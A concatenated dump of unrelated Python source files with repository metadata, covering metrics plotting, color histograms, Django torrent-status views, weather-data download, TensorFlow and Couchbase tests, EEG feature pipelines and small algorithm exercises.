import plotly.graph_objs as go
import os
# Collect every per-run directory under logs/.
dirs = os.listdir('logs')
dirs = list(filter(lambda f: os.path.isdir('logs/'+f), dirs))

# Map run name -> (cost series, accuracy series), skipping runs with a
# missing or empty metrics file.
data = dict()
for name in dirs:
    if not os.path.isfile('logs/'+name+'/cost_and_acc.csv'):
        # Parenthesized so this works as both a Python 2 statement and a
        # Python 3 function call.
        print(name + ' does not have cost.csv')
        continue
    df = pd.read_csv('logs/'+name+'/cost_and_acc.csv')
    # Fix: DataFrame.as_matrix() was deprecated and removed in pandas 1.0;
    # .values is the equivalent that works on old and new pandas alike.
    if len(df['Cost'].values) == 0:
        continue
    # NOTE: the accuracy column name really does start with a space.
    data[name] = (df['Cost'].values, df[' Accuracy'].values)

# One cost/accuracy plot per run with at least 3 recorded points.
for name, (cost, acc) in data.items():
    if len(cost) < 3:
        continue
    # Fix: this list was previously bound to the name 'data', shadowing
    # the dict being iterated above.
    traces = [
        go.Scatter(x=list(range(len(cost))),
                   y=cost,
                   mode='lines+markers',
                   name='Cost'),
        go.Scatter(x=list(range(len(acc))),
                   y=acc,
                   mode='lines+markers',
                   name='Accuracy')
    ]
    layout = go.Layout(
        title=name,
        xaxis=dict(title='Iteration * 20'),
        yaxis=dict(title='Metric Value')
    )
    plot({'data': traces, 'layout': layout}, filename='plots/'+name+'_metrics.html')
"[email protected]"
] | |
4f5bd2145ed1e3def380adc78118dd2eac97e1b4 | d66141796bcaf9b1f895be0226f7400ca8d579cf | /color_histogram/core/hist_common.py | 8804159b85f6d765fc442976f017235e42123ff9 | [
"MIT"
] | permissive | absbin/ColorHistogram | 51004ca4bad2b83ff9f496cb6097d654fa30583f | 0743376d5d89d4c8aacc986bb3d64a0098877480 | refs/heads/master | 2020-04-21T17:37:15.035363 | 2019-02-10T19:50:09 | 2019-02-10T19:50:09 | 169,741,939 | 0 | 0 | MIT | 2019-02-08T13:51:22 | 2019-02-08T13:51:22 | null | UTF-8 | Python | false | false | 1,733 | py | # -*- coding: utf-8 -*-
## @package color_histogram.core.hist_common
#
# Common color histogram functions for 1D, 2D, 3D.
# @author tody
# @date 2015/08/29
import numpy as np
def colorCoordinates(color_ids, num_bins, color_range):
    # Map histogram bin indices to color-space coordinates.
    # color_ids: sequence of per-channel index arrays (e.g. np.where output).
    # Returns coordinates linearly interpolated over [c_min, c_max].
    c_min, c_max = color_range
    id_matrix = np.array(color_ids).T
    return c_min + (id_matrix * (c_max - c_min)) / float(num_bins - 1.0)
def colorDensities(hist_bins):
    # Densities of the occupied bins, normalized so the densest bin is 1.0.
    positive = hist_bins > 0.0
    densities = np.float32(hist_bins[positive])
    return densities / np.max(densities)
def rgbColors(hist_bins, color_bins):
    # Colors of the occupied bins, clamped to the valid [0, 1] RGB range.
    occupied = hist_bins > 0.0
    return np.clip(color_bins[occupied, :], 0.0, 1.0)
def clipLowDensity(hist_bins, color_bins, alpha):
    # Zero out, in place, bins whose density is below alpha * mean density,
    # together with their RGB entries in color_bins.
    density_mean = np.mean(hist_bins)
    low_density = hist_bins < density_mean * alpha
    hist_bins[low_density] = 0.0
    # Fix: xrange is Python 2 only (NameError on Python 3); range works
    # identically here on both.
    for ci in range(3):
        color_bins[low_density, ci] = 0.0
def densitySizes(color_densities, density_size_range):
    # Exponential interpolation between the min and max marker sizes:
    # density 0.0 -> size_min, density 1.0 -> size_max.
    density_size_min, density_size_max = density_size_range
    density_size_factor = density_size_max / density_size_min
    return density_size_min * np.power(density_size_factor, color_densities)
def range2ticks(tick_range, decimals=1):
    # Round tick positions; values above 10 are rounded to whole numbers.
    ticks = np.around(tick_range, decimals=decimals)
    big = ticks > 10
    ticks[big] = np.rint(ticks[big])
    return ticks
def range2lims(tick_range):
    # Pad each (min, max) row outward by 10% of its span to get axis limits.
    margin = 0.1 * (tick_range[:, 1] - tick_range[:, 0])
    lim = np.array(tick_range)
    lim[:, 0] -= margin
    lim[:, 1] += margin
    return lim
| [
"[email protected]"
] | |
81519b9144aeb9c939806eb0d2d04dafbbf4b122 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/sets_20200609191647.py | c8142142fb9e8aff031b9767f3c3d70a3fcfbf5a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | import json
def Strings(str):
    """Combine "KEY:VALUE" strings, summing the values of repeated keys.

    Each input item looks like "Z:1".  The result concatenates every
    distinct key with its summed value, sorted by key, e.g.
    ["Z:1","B:3","C:3","Z:4","B:2"] -> "B:5,C:3,Z:5".  The combined
    string is printed and returned.

    Fix: the previous active code was a syntax error (`append(in)`) and
    never produced a result; this implements the intent evidenced by the
    commented-out code and the expected-output comment below.
    """
    # Sum the integer values per key.
    totals = {}
    for entry in str:
        key, value = entry.split(":")
        totals[key] = totals.get(key, 0) + int(value)

    # Join the keys in sorted order as "KEY:VALUE" pairs.
    combined = ",".join(k + ":" + json.dumps(totals[k]) for k in sorted(totals))
    print(combined)
    return combined


Strings(["Z:1", "B:3", "C:3", "Z:4", "B:2"])
# "B:5,C:3,Z:5"
| [
"[email protected]"
] | |
ba97fb24529d7aa94bd21ccf716216cc351abd99 | 3437c90948fef98f3db081b741b96d50666b2a39 | /api/views.py | 0164884433e2f10716eb991bd19c55e9dfe8d968 | [] | no_license | jimrollenhagen/WhatManager3 | 897080e5125c0bbb5bce8366b0eb5ca1118e1bc8 | fb14b3527f6263045471fdd48384f1f7007c5bc0 | refs/heads/master | 2020-12-03T10:26:34.324705 | 2014-10-22T05:03:10 | 2014-10-21T21:57:12 | 25,735,775 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,477 | py | # Create your views here.
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from api.management import ApiManager
from torrents.client import TorrentManagerException
from torrents.models import ClientTorrent
from trackers.client import TrackerManagerException
from trackers.loader import get_tracker_torrent_model
@csrf_exempt
@require_POST
def add_torrent(request):
    """POST handler: ask the ApiManager to add one tracker torrent.

    Expects 'tracker' and 'torrent_id' in the POST body.  Manager errors
    are serialized back to the caller as JSON.
    """
    tracker = request.POST['tracker']
    torrent_id = request.POST['torrent_id']
    try:
        ApiManager().add_torrent(tracker, torrent_id)
    except (TrackerManagerException, TorrentManagerException) as e:
        return JsonResponse(e.__dict__)
    return JsonResponse({'success': True})
@csrf_exempt
@require_POST
def delete_torrent(request):
    """POST handler: delete a torrent identified by info hash and/or
    (tracker, torrent_id).  All three POST fields are optional; manager
    errors are serialized back to the caller as JSON.
    """
    post = request.POST
    info_hash = post.get('info_hash')
    tracker = post.get('tracker')
    torrent_id = post.get('torrent_id')
    try:
        ApiManager().delete_torrent(info_hash, tracker, torrent_id)
    except (TrackerManagerException, TorrentManagerException) as e:
        return JsonResponse(e.__dict__)
    return JsonResponse({'success': True})
def torrents_status(request):
    """GET handler: report the download status of a set of torrents.

    Torrents are selected either by 'info_hashes' (comma-separated) or by
    'tracker' + 'ids' (comma-separated tracker torrent ids).  The response
    maps each requested key to {'status': 'missing'|'downloading'|
    'downloaded'}, with 'progress' included while downloading.
    """
    requested = {}
    if 'info_hashes' in request.GET:
        for info_hash in request.GET['info_hashes'].split(','):
            requested[info_hash] = info_hash
    if 'tracker' in request.GET and 'ids' in request.GET:
        id_list = request.GET['ids'].split(',')
        model = get_tracker_torrent_model(request.GET['tracker'])
        for row in model.objects.filter(id__in=id_list).only('id', 'info_hash'):
            requested[row.id] = row.info_hash

    # Look up all known client torrents for the requested hashes at once.
    found = {}
    for t in ClientTorrent.objects.filter(info_hash__in=requested.values()):
        found[t.info_hash] = t

    statuses = {}
    for key, info_hash in requested.items():
        torrent = found.get(info_hash)
        if torrent is None:
            status = {
                'status': 'missing',
            }
        elif torrent.done < 1:
            status = {
                'status': 'downloading',
                'progress': torrent.done,
            }
        else:
            status = {
                'status': 'downloaded',
            }
        statuses[key] = status
    return JsonResponse(statuses)
| [
"[email protected]"
] | |
d2ca79b04e4f33f3da1aacc21ab5523ec50d6cc0 | 6fa625feb79934951985ddfa3889886abbe0dc8e | /crawlers/ddgmuiWyoming/wyoming.py | 29a664e5f3caed892131c88183e08f5b65b083ba | [] | no_license | anukaisolutions/Vayudev | b539ab085aac1fd285953289f7bff9b47bfeb080 | 905f749d1678ab36211b1ead1dd005ce03221d72 | refs/heads/master | 2021-01-13T19:16:41.775458 | 2020-02-23T14:06:50 | 2020-02-23T14:06:50 | 242,467,839 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py |
def getData(year, month, from1, to, station):
    """Download a Wyoming upper-air sounding and save it as text.

    Writes the raw response body to wyomingData/<station>.txt.

    Fixes:
    - The parameters were misspelled (form1/statio) while the body used
      from1/station, so the function silently read the module-level
      globals instead of its own arguments.
    - The old byte-escape unmangling loop (str(response.content) plus
      manual '\\\\'/'n' handling) dropped every literal 'n' in the data;
      response.text is the already-decoded body.
    """
    url = "http://weather.uwyo.edu/cgi-bin/sounding?region=seasia&TYPE=TEXT%3ARAW&YEAR="+year+"&MONTH="+month+"&FROM="+from1+"&TO="+to+"&STNM="+station
    import requests
    response = requests.get(url)
    name = "wyomingData/" + station + ".txt"
    with open(name, 'w') as file:
        file.write(response.text)
# Download the sounding for each station of interest.
year = "2019"
month = "3"
# FROM/TO appear to be DDHH strings (day 27, hour 00) -- presumably the
# Wyoming query's time-window format; verify against the site.
from1 = "2700"
to = "2700"
stationCodes = ['42707','42101','42182','42339','42361','42379','42299','42314']
for station in stationCodes:
    getData(year,month,from1,to,station)
| [
"[email protected]"
] | |
4bc1e9b731c78cf2eade21f26145cd1de06357af | 49536aafb22a77a6caf249c7fadef46d63d24dfe | /tensorflow/tensorflow/contrib/learn/python/learn/estimators/rnn_common_test.py | 5df08f5fdc138fbb912f8ebcd33bc37ce60bc5d2 | [
"Apache-2.0"
] | permissive | wangzhi01/deeplearning-1 | 4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d | 46ab82253d956953b8aa98e97ceb6cd290e82288 | refs/heads/master | 2020-05-28T03:14:55.687567 | 2018-09-12T16:52:09 | 2018-09-12T16:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.rnn_common."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class RnnCommonTest(test.TestCase):
    """Unit tests for the rnn_common masking/selection helpers."""

    def testMaskActivationsAndLabels(self):
        """Test `mask_activations_and_labels`."""
        batch_size = 4
        padded_length = 6
        num_classes = 4
        np.random.seed(1234)
        # Per-example valid lengths; may be 0, in which case that row
        # contributes nothing to the masked output.
        sequence_length = np.random.randint(0, padded_length + 1, batch_size)
        activations = np.random.rand(batch_size, padded_length, num_classes)
        labels = np.random.randint(0, num_classes, [batch_size, padded_length])
        (activations_masked_t,
         labels_masked_t) = rnn_common.mask_activations_and_labels(
             constant_op.constant(activations, dtype=dtypes.float32),
             constant_op.constant(labels, dtype=dtypes.int32),
             constant_op.constant(sequence_length, dtype=dtypes.int32))
        with self.test_session() as sess:
            activations_masked, labels_masked = sess.run(
                [activations_masked_t, labels_masked_t])

        # The masked output flattens the batch: one row per valid step.
        expected_activations_shape = [sum(sequence_length), num_classes]
        np.testing.assert_equal(
            expected_activations_shape, activations_masked.shape,
            'Wrong activations shape. Expected {}; got {}.'.format(
                expected_activations_shape, activations_masked.shape))

        expected_labels_shape = [sum(sequence_length)]
        np.testing.assert_equal(expected_labels_shape, labels_masked.shape,
                                'Wrong labels shape. Expected {}; got {}.'.format(
                                    expected_labels_shape, labels_masked.shape))
        # Walk the flattened rows in order and compare each against the
        # corresponding (batch, step) entry of the source arrays.
        masked_index = 0
        for i in range(batch_size):
            for j in range(sequence_length[i]):
                actual_activations = activations_masked[masked_index]
                expected_activations = activations[i, j, :]
                np.testing.assert_almost_equal(
                    expected_activations,
                    actual_activations,
                    err_msg='Unexpected logit value at index [{}, {}, :].'
                    ' Expected {}; got {}.'.format(i, j, expected_activations,
                                                   actual_activations))

                actual_labels = labels_masked[masked_index]
                expected_labels = labels[i, j]
                np.testing.assert_almost_equal(
                    expected_labels,
                    actual_labels,
                    err_msg='Unexpected logit value at index [{}, {}].'
                    ' Expected {}; got {}.'.format(i, j, expected_labels,
                                                   actual_labels))
                masked_index += 1

    def testSelectLastActivations(self):
        """Test `select_last_activations`."""
        batch_size = 4
        padded_length = 6
        num_classes = 4
        np.random.seed(4444)
        sequence_length = np.random.randint(0, padded_length + 1, batch_size)
        activations = np.random.rand(batch_size, padded_length, num_classes)
        last_activations_t = rnn_common.select_last_activations(
            constant_op.constant(activations, dtype=dtypes.float32),
            constant_op.constant(sequence_length, dtype=dtypes.int32))
        with session.Session() as sess:
            last_activations = sess.run(last_activations_t)

        expected_activations_shape = [batch_size, num_classes]
        np.testing.assert_equal(
            expected_activations_shape, last_activations.shape,
            'Wrong activations shape. Expected {}; got {}.'.format(
                expected_activations_shape, last_activations.shape))
        # Row i should equal the activations at the final valid step.
        # NOTE(review): a sequence_length of 0 makes the index -1 (the last
        # padded step); presumably tolerated for this fixed seed -- confirm.
        for i in range(batch_size):
            actual_activations = last_activations[i, :]
            expected_activations = activations[i, sequence_length[i] - 1, :]
            np.testing.assert_almost_equal(
                expected_activations,
                actual_activations,
                err_msg='Unexpected logit value at index [{}, :].'
                ' Expected {}; got {}.'.format(i, expected_activations,
                                               actual_activations))
# Run the tests when executed directly.
if __name__ == '__main__':
    test.main()
| [
"[email protected]"
] | |
62bca78d93bc3f22a19ac5decef2c0c10190c48a | 5f36eba5cf27cda8198cad11f0486d379a5ca9f0 | /gen_features.py | f35b063158b60ce886115751c8f5d62fdfe819e8 | [
"MIT"
] | permissive | A-Jacobson/iEEG_Seizure_Prediction | 16354a67cb5c429935d1ce00f1c1647349ddb9ea | bdee7f4aab72674e01af7ec254b5d6ec7f65e620 | refs/heads/master | 2020-07-06T13:05:46.155605 | 2016-09-16T22:02:19 | 2016-09-16T22:02:19 | 67,307,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | from pipeline import Pipeline
from eeg_io import load_data
from transforms import *
import multiprocessing as mp
pipelines = [
# statstical features
Pipeline([Mean()]),
Pipeline([Mean(), Abs()]),
Pipeline([Abs(), Mean()]),
Pipeline([Stats()]),
Pipeline([CorrelationMatrix()]),
# Pipeline([CorrelationMatrix(), Eigenvalues()]), # under construction
# time domain features
Pipeline([Resample(600)]),
Pipeline([LPF(5.0), Resample(600)]),
Pipeline([LPF(5.0), Interp(), Resample(600)]),
Pipeline([Interp(), Resample(600)]),
Pipeline([Resample(1200)]),
Pipeline([LPF(5.0), Resample(1200)]),
Pipeline([Interp(), Resample(1200)]),
# frequency domain features
Pipeline([FFT(), Slice(1, 48), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 64), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 96), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 128), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 160), Magnitude(), Log10()]),
# combination features (under construction)
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Image features
#Pipeline([SpectrogramImage(size=(224, 224, 3))]) # under construction
]
folders = ['train_1', 'test_1', 'train_2', 'test_2', 'train_3', 'test_3']
def gen_features(folder):
if 'train' in folder:
for p in pipelines:
X, y, files = load_data(folder)
p.to_file(X, files, folder, y)
else:
for p in pipelines:
X, files = load_data(folder)
p.to_file(X, files, folder)
if __name__ == '__main__':
processes = 6
p = mp.Pool(processes)
p.map(gen_features, folders)
| [
"[email protected]"
] | |
505e010e347cb6852cbd67ae05cfa5a801a854ef | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/88/usersdata/197/59698/submittedfiles/listas.py | 42280df62eb2e1e110c8e6ea113e2b5f83248d61 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | # -*- coding: utf-8 -*-
def degrau (a):
b=[]
for i in range (0,len(a)-1,1):
diferenca=(-1)*(a[i]-a[i+1])
b.append(diferenca)
return (b)
def maior (a):
maior=a[0]
for i in range (0,len(a),1):
if a[i]>maior:
maior=a[i]
return (maior)
def maiordegrau (lista):
b=degrau(lista)
m=maior(b)
return(m)
lista=[]
n=int(input('Digite o numero de elementos da lista:'))
for i in range (1,n+1,1):
valor=float(input('Digite o numero da lista:'))
lista.append(valor)
print(maiordegrau(lista)) | [
"[email protected]"
] | |
f4ffb83165231227b2683d436abb21d63dea3822 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /q7BdzRw4j7zFfFb4R_16.py | f9daf2b8e0b3ec99b99073498e00d7020dc7733f | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | """
Create a function that takes two lists and combines them by alternatingly
taking elements from each list in turn.
* The lists may be of different lengths, with at least one character / digit.
* The first list will contain string characters (lowercase, a-z).
* The second list will contain integers (all positive).
### Examples
merge_arrays(["a", "b", "c", "d", "e"], [1, 2, 3, 4, 5])
➞ ["a", 1, "b", 2, "c", 3, "d", 4, "e", 5]
merge_arrays([1, 2, 3], ["a", "b", "c", "d", "e", "f"])
➞ [1, "a", 2, "b", 3, "c", "d", "e", "f"]
merge_arrays(["f", "d", "w", "t"], [5, 3, 7, 8])
➞ ["f", 5, "d", 3, "w", 7, "t", 8]
### Notes
N/A
"""
def merge_arrays(a, b):
    """Interleave the elements of `a` and `b`, starting with `a`.

    At each position i the element of `a` (if any) comes first, then the
    element of `b` (if any); once the shorter list is exhausted the rest
    of the longer one is appended in order. Neither input is modified.

    Args:
        a: first list (may be any length >= 0).
        b: second list.

    Returns:
        A new list with the elements of `a` and `b` alternating.

    Note: the original copied both inputs and repeatedly called
    list.pop(0), which is O(n) per call (O(n^2) overall); a single index
    loop is linear and needs no copies.
    """
    merged = []
    for i in range(max(len(a), len(b))):
        if i < len(a):
            merged.append(a[i])
        if i < len(b):
            merged.append(b[i])
    return merged
| [
"[email protected]"
] | |
a9afdee321162791bb14de296c179bfd662c9631 | 46c31992b665615e410f1869b9f7a91ed57a2637 | /couchbase/tests/cases/rget_t.py | c7a8cd4db499d9584d590617ed33a4396847008a | [
"Apache-2.0"
] | permissive | what-studio/couchbase-python-client | 4bca31917a519ad2d61bc93f37faa7f4af81d32d | 1aa78f1559fe2407d664b7d5fd1f885359750147 | refs/heads/master | 2021-01-12T08:34:06.866811 | 2016-12-02T00:05:15 | 2016-12-02T16:31:24 | 76,612,814 | 1 | 1 | null | 2016-12-16T02:09:30 | 2016-12-16T02:09:29 | null | UTF-8 | Python | false | false | 3,351 | py | #
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase.exceptions import NotFoundError, ArgumentError
from couchbase.tests.base import MockTestCase
from couchbase.mockserver import MockControlClient
class ReplicaGetTest(MockTestCase):
    """Tests replica-read (rget) behaviour against the mock Couchbase server.

    Keys are seeded directly onto master/replica vbuckets through the mock
    server's REST control channel, so the client's replica reads can be
    exercised deterministically.
    """

    def setUp(self):
        super(ReplicaGetTest, self).setUp()
        # Only meaningful against the mock server, and needs
        # libcouchbase >= 2.0.7 (presumably the first release with
        # replica-read support -- confirm against release notes).
        self.skipUnlessMock()
        self.skipLcbMin("2.0.7")
        self.mockclient = MockControlClient(self.mock.rest_port)

    def test_get_kw(self):
        """get(replica=True) succeeds when the key exists only on replicas."""
        key = self.gen_key("get_kw")
        # Seed the key on every replica but NOT on the master.
        self.mockclient.cache(key,
                              on_master=False,
                              replica_count=self.mock.replicas,
                              value=99,
                              cas=1234)
        # A plain get goes to the master vbucket and must fail...
        self.assertRaises(NotFoundError,
                          self.cb.get, key)
        # ...while a replica read finds the seeded value.
        rv = self.cb.get(key, replica=True)
        self.assertTrue(rv.success)
        self.assertEqual(rv.value, 99)

    def _check_single_replica(self, ix):
        """Seed a key only on replica `ix` and verify rget targeting."""
        key = self.gen_key("get_kw_ix")
        # Ensure the key is removed from the master and all replicas.
        self.mockclient.purge(key,
                              on_master=True,
                              replica_count=self.mock.replicas)
        # Getting it should raise an error...
        self.assertRaises(NotFoundError, self.cb.get, key)
        # ...as should getting it from any replica...
        self.assertRaises(NotFoundError, self.cb.rget, key)
        # ...and from each specific replica index.
        for jx in range(self.mock.replicas):
            self.assertRaises(NotFoundError, self.cb.rget, key,
                              replica_index=jx)
        # Store the key on the desired replica only.
        self.mockclient.cache(key,
                              on_master=False,
                              replicas=[ix],
                              value=ix,
                              cas=12345)
        # Reading from "any replica" should ultimately succeed.
        self.cb.get(key, replica=True)
        rv = self.cb.rget(key)
        self.assertTrue(rv.success)
        self.assertEqual(rv.value, ix)
        # Reading from the specific replica should succeed.
        rv = self.cb.rget(key, replica_index=ix)
        self.assertTrue(rv.success)
        self.assertEqual(rv.value, ix)
        # Reading from any other replica should fail.
        for jx in range(self.mock.replicas):
            if jx == ix:
                continue
            self.assertRaises(NotFoundError,
                              self.cb.rget,
                              key,
                              replica_index=jx)

    def test_get_ix(self):
        """Run the single-replica check for every replica index."""
        # NOTE(review): `key` is unused here; _check_single_replica
        # regenerates its own key.
        key = self.gen_key("get_kw_ix")
        for ix in range(self.mock.replicas):
            self._check_single_replica(ix)
| [
"[email protected]"
] | |
43196f723a7336bcf3a95d9474d07b8fbaf707fd | e72c937f783e79f41468d992fead4e2085de1775 | /src/week 4/day 3/using_object_main.py | 159e6f58b74160936df6aa2ce755b28005e8a72b | [] | no_license | NoroffNIS/Python_Examples | 13dac7313472a9cdefe66a61302f4024a4a8af0f | ffab09002d3549e6f440a303fccc0fd61bb80472 | refs/heads/master | 2021-04-26T06:04:33.034864 | 2018-01-03T13:26:19 | 2018-01-03T13:26:19 | 59,116,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from objects import *
# NOTE(review): ClassName is bound, NOT instantiated -- my_object is the
# class object itself, so the instance methods below are called with the
# class passed explicitly in place of `self`. Presumably a deliberate demo
# of how `self` binding works; confirm against objects.py.
my_object = ClassName
print(my_object.__doc__)           # class docstring
print(my_object.class_variable)    # class-level attribute
my_object.class_method(my_object)  # explicit "self" argument
my_object.print_class_variable(my_object)
| [
"[email protected]"
] | |
60154e9f98b90231bbbe31299e779005708de9c8 | df42b0d05038a2940606591d548637bc51d6573d | /aid1907/leetcode_test/最大柱状矩阵/new_test.py | 035a46bb7169dbdb17830bdebe6ff12994a3581e | [] | no_license | ThreePointFive/aid1907_0814 | 440113f5ae2df28e53a088bd3ea420d5558214b4 | 99eea9aafdf8211278425c33aba2e64d5eb2500b | refs/heads/master | 2022-12-03T19:31:21.085608 | 2019-11-09T06:25:33 | 2019-11-09T06:25:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,265 | py | import time
def max_j(heights):
    """Return the area of the largest rectangle in the histogram `heights`.

    Replaces the original O(n^3) scan (min() over every sub-slice) with
    the standard monotonic-stack algorithm, which is O(n) time and O(n)
    space and returns the same result for every input.

    Args:
        heights: list of numeric bar heights (may be empty).

    Returns:
        The maximal rectangle area, or 0 for an empty list.
    """
    if not heights:
        return 0
    best = 0
    stack = []  # indices of bars with non-decreasing heights
    # A trailing sentinel of height 0 flushes everything off the stack.
    for i, h in enumerate(heights + [0]):
        while stack and heights[stack[-1]] >= h:
            height = heights[stack.pop()]
            # The popped bar extends from just after the previous lower
            # bar (or index 0) up to i-1.
            left = stack[-1] + 1 if stack else 0
            best = max(best, height * (i - left))
        stack.append(i)
    return best
a=time.time()
list3=max_j([9046155,17522430,44186957,40374643,77652689,89027934,97586333,68834337,62979669,1783127,29339118,83907628,48067922,22843915,11027247,73603247,32376863,12448072,7086475,2369889,5064817,88893600,61558880,77108330,32113014,21324782,28294417,18403046,39022240,58687324,80978280,584748,76209754,25165237,40959391,6378795,66709524,38545724,75213133,29689193,92845203,4552251,13596821,40913125,27396166,24624068,67032725,12289382,89588493,74119200,14659271,94653310,15529152,28734503,24277993,47642166,50059286,52572410,18561565,89081526,11259734,99539845,42182626,39985840,24705083,83142017,46364635,43930959,74204093,74094120,73620152,67049296,31162724,87216973,7962422,58558890,64357394,27511499,23364624,53945887,1630699,38023896,1115549,69676203,66758399,25393542,17318370,16817685,30482304,88396287,58415564,94258390,87936132,598190,34244230,65157567,36256560,80608866,9088526,10460653,7219338,82708678,77509950,38382062,22442004,37988724,49457305,39315750,65500223,72821929,93261637,19647274,63362177,46893538,89323477,30120577,24803433,59158199,99454614,55285737,47554486,10386530,2060480,88006971,63501073,36304710,53164538,99757633,69429928,14769417,62734638,76649267,49994447,40244588,15031329,24952803,30749664,64488634,64268553,48766239,89826916,10046542,68413513,53189093,56940081,10253343,83309670,81743514,69411542,35280637,89545603,69482381,98183519,91606083,57489352,61684592,27910794,63170242,13958577,49857074,30456011,76693216,26506341,80450459,69454156,94054023,5403262,52720173,11059009,22188168,1486412,885925,32234710,22416278,54075019,89174791,32669621,89901041,23434657,54597515,77698030,65496613,24079896,75881550,57102696,34085600,90082494,37529842,97255843,4041072,87386917,27711854,33250640,66409610,60678665,2704796,60463633,18598280,7941321,24038995,40786448,9427734,24924920,73021158,31844012,31516291,14712302,17029985,21417333,38146959,71627500,99115363,56159924,48223749,27513265,13262621,82309349,17595760,50792463,32081544,74153184,90695732,12309751,74038
24,57105343,72988416,62624972,70085328,91586696,70566294,94124323,32373144,32510380,71565596,57910655,16870744,3081887,72622957,33900729,24499220,63286268,5528229,76130936,19446193,6268330,56160553,85225166,88577680,73756313,36017629,20659224,425849,79229714,32968975,60346025,88851409,58473744,22970998,58936737,50060440,46053644,5577413,34949937,31080376,77143009,92860592,47951120,80224896,65483549,81851849,57240469,81286169,39896430,85887757,732362,46164761,42048310,38473880,87258793,68320976,74491510,7918017,68746825,6237576,93403345,29092851,95088985,51877089,4580201,6542074,54453881,3150197,12119487,89403818,34230573,89262496,82264410,34698045,22003745,264311,16549894,31760566,81550481,8962676,70164675,34799195,7643789,64729337,73273076,94902582,85566665,280938,2820600,6829843,59034866,48740297,88439046,54123851,617386,45535599,60665925,7587619,48685796,72785413,96991438,35432721,14564261,31772200,70130766,89084358,32036512,39197012,73361276,66103345,48159688,96042303,53418892,55803478,13287993,26691968,3222412,98854658,79489258,6043012,5684501,38524124,7299661,94123547,45164327,60433399,39659146,5830253,68021019,40861294,31132018,65012457,76294015,98212631,96784657,98941133,39813342,81337521,38138145,65690970,47440866,38814186,61733274,53376111,47134016,75021267,32584431,50356428,26392277,12073690,8915793,32076779,3114166,16215454,78716678,794846,76648854,70892177,6625099,44669873,64269823,90273469,62198682,93080191,41002452,11499691,92021324,80815794,92837213,82675822,46506765,92794431,21490008,60756391,46170542,68624024,88294010,78754974,18980452,14686287,43345016,80412597,99279418,98975534,96628052,77996097,99770380,73276906,1404626,58911831,70463131,65674449,49185300,32661813,58754640,42704105,44161504,3292317,23519899,89515069,85968139,22543016,82309501,7458147,35815759,80996395,28598523,24109769,12267721,95327,91312409,8129089,80507925,90591827,7104624,77135977,21104276,59391356,2929235,22508902,18303188,73392366,40699704,20004840,6054179,51970696,6270894
